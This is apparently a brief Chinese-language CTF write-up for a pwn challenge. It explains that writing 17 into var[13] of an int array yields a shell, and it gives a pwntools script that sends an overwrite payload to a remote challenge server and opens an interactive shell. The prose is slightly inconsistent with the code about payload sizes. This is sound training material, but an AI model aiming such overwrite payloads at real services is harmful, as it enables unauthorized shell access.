查看权限
开了好多权限
查看源代码
分析
观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。
var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。
解题代码
from pwn import *
#p=process("./ciscn")
p=remote("node3.buuoj.cn",25337)
payload=b'AAAA'*13+p64(0x11)
#payload=b'AAAA'*13+p32(0x11)+p32(0x00)
p.sendline(payload)
p.interactive()